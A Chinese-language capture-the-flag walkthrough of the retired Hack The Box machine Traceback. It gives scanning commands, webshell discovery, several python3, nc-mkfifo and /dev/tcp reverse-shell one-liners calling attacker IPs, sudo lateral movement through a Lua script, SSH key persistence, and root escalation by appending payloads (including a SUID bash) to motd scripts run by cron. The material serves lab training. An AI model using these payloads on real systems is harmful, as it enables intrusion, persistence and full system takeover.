本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.181
本次使用https://github.com/Tib3rius/Traceback进行自动化全方位扫描
信息枚举收集 https://github.com/codingo/Reconnoitre 跟autorecon类似 autorecon 10.10.10.181 -o ./Traceback-autorecon masscan -p1-65535 10.10.10.181 --rate=1000 -e tun0 > ports ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr ' ' ',' | sed 's/,$//') nmap -Pn -sV -sC -p$ports 10.10.10.181
发现就开放了两个端口22和80,直接访问80端口,发现页面提示反馈目标靶机被黑了,再查看burp抓包的响应信息,发现如下: Some of the best web shells that you might need 根据上述的信息丢到Google上搜索一把,发现一个GitHub链接 https://github.com/TheBinitGhimire/Web-Shells 链接显示有如下种类的webshell
alfav3-encoded.php alfav4.1-decoded.php alfav4.1-encoded.php andela.php bloodsecv4.php by.php c99ud.php cmd.php configkillerionkros.php mini.php obfuscated-punknopass.php punk-nopass.php punkholic.php r57.php smevk.php TwemlowsWebShell.php wso2.8.5.php
通过目录爆破加载此webshell字典进行猜测 gobuster dir -u http://10.10.10.181 -w webshellwords.txt
发现了此webshell,根据GitHub上显示的内容,账号和密码都是admin,登录进去之后翻看了下功能,找到执行命令的位置,进行反弹shell,这里查找了支持反弹shell的环境,没有python2版本,但是有python3版本,nc也有,但是使用-e参数不成功,那就使用python3进行反弹shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2",8833));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' &
得到反弹shell之后,对应的用户是webadmin,到其家目录查看内容,发现提示 webadmin@traceback:/home$ cat /home/webadmin/note.txt cat /home/webadmin/note.txt - sysadmin - I have left a tool to practice Lua. I'm sure you know where to find it. Contact me if you have any question. 这是让执行lua脚本啊,查看下历史记录 webadmin@traceback:/home$ history history 1 ls -la 2 sudo -l 3 nano privesc.lua 4 sudo -u sysadmin /home/sysadmin/luvit privesc.lua 5 rm privesc.lua 6 logout 7 id 8 pwd 9 id 10 pw 11 dls 12 ls 13 ls /home 14 cd /home 15 ls 16 ls -la /home/webadmin/ 17 cat /home/webadmin/note.txt 18 history webadmin@traceback:/home$
看到上面就清晰明朗了,写一个lua脚本移动到用户sysadmin https://gtfobins.github.io/gtfobins/lua/ echo "require('os');" > cntf.lua echo "os.execute('/bin/bash');" >> cntf.lua 上述在tmp目录下生成,然后执行sudo横向移动 sudo -u sysadmin /home/sysadmin/luvit cntf.lua
成功进行shell环境,但是不好看,使用bash -i进入一个带用户和主机名的shell环境,为了更好的shell环境操作,写一个公钥进去使用私钥登录 echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDfjdrW5okibmnT9c3hsAoSZPJ0XcCN92f998ZkCcWehEHXTmpkGJE7qedYSbr78pQITNnIXpVEJXlKYaTQUf68JUKCiBWwLQes3SfHN6SoRe4hiC4LtgtXiUmRIYYY//PXEdgbH7dFvX67fA8p/6Mz/R6ITS4OvHDQCLNwV8wmu46pS4xEq9/Rsp3nc6OjHVWAvnwnBmNTjUWEGuKH5Vvqw5yM0/PV5SeeyaB0R5jm4M7YL1/h8RRVvInt5M20/FaR5wWL4pEeGXsqKPjZUtdCfgPkZwF/4Oi6aOYSKGVmQrnbsetG5F2//IuUTBEkgQp4HevL1hNw3iAH+PNh/iHlVhafeYw9rZ/G9G97vGCsTy7UVYRk55nJQuHTRhZOkt8jAqfBgjLwP/Gn6wXIGWFmSLaKO//jJuSYYVXGIu9vjTGSLEUQtSQKrf+vL94jtGDRYArDnqFvJopj3HJK39B8O2PhVhQ0bh+YbQNWPoHsc5O7UH/6LcREUnppzSKf2yE= kali@kali" >> /home/sysadmin/.ssh/authorized_keys
开始要提权root了,查看下进程活动情况
通过pspy查看进程运行状况 https://github.com/DominicBreuker/pspy
执行完成进程监控,发现如下可疑行为,确认是个计划任务每分钟执行一下这个备份脚本,来覆盖目录/etc/update-motd.d/下的所有文件 2021/04/28 19:57:11 CMD: UID=0 PID=1 | /sbin/init noprompt 2021/04/28 19:57:31 CMD: UID=0 PID=2684 | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/ 2021/04/28 19:58:01 CMD: UID=0 PID=2689 | sleep 30 2021/04/28 19:58:01 CMD: UID=0 PID=2688 | /bin/sh -c /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 2021/04/28 19:58:01 CMD: UID=0 PID=2687 | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 2021/04/28 19:58:01 CMD: UID=0 PID=2686 | /usr/sbin/CRON -f 2021/04/28 19:58:01 CMD: UID=0 PID=2685 | /usr/sbin/CRON -f 2021/04/28 19:58:01 CMD: UID=??? PID=2690 | ??? 2021/04/28 19:58:31 CMD: UID=0 PID=2691 | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/ 2021/04/28 19:59:01 CMD: UID=0 PID=2696 | sleep 30 2021/04/28 19:59:01 CMD: UID=0 PID=2695 | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 2021/04/28 19:59:01 CMD: UID=??? PID=2693 | ??? 2021/04/28 19:59:01 CMD: UID=0 PID=2692 | /usr/sbin/CRON -f 2021/04/28 19:59:31 CMD: UID=0 PID=2698 | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/
根据上面信息,提权操作就是为了触发motd里面以root进程运行的脚本,从而反弹shell,具体相关资料如下:
https://manpages.ubuntu.com/manpages/trusty/man5/update-motd.5.html https://linuxconfig.org/how-to-change-welcome-message-motd-on-ubuntu-18-04-server
反弹shell各种姿势如下:
第一种 https://inth3wild.medium.com/traceback-hack-the-box-writeup-bbd44187feef import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.14.2",8833)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]); 第二种 echo "mkfifo /tmp/p; nc 10.10.14.2 8833 0</tmp/p | /bin/sh > /tmp/p 2>&1; rm /tmp/p" >> /etc/update-motd.d/00-header 上述执行完成之后,快速执行ssh 10.10.10.181 -l sysadmin 触发脚本 升级为tty-shell python3 -c 'import pty; pty.spawn("/bin/bash")' 示例 sysadmin@traceback:/etc/update-motd.d$ export shell="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.110 4444 >/tmp/f" sysadmin@traceback:/etc/update-motd.d$ echo $shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.110 4444 >/tmp/f sysadmin@traceback:/etc/update-motd.d$ echo $shell >> 00-header sysadmin@traceback:/etc/update-motd.d$ 第三种 自己传个带参数-e的nc到目标靶机上去操作,可参考:https://dalemazza.github.io/htb/2020/08/26/HTB-Traceback-Write-up.html 第四种 echo 'bash -c "bash -i >& /dev/tcp/10.10.14.7/443 0>&1"' >> 00-header 第五种 https://flast101.github.io/HTB-writeups/traceback/ 第六种 echo 'chmod u+s /bin/bash' >> 00-header 第七种 echo -ne '#!/bin/sh rm -rf /tmp/p; mknod /tmp/p p; /bin/bash </tmp/p | /bin/nc 10.10.16.125 1234 >/tmp/p' > /etc/update-motd.d/00-header
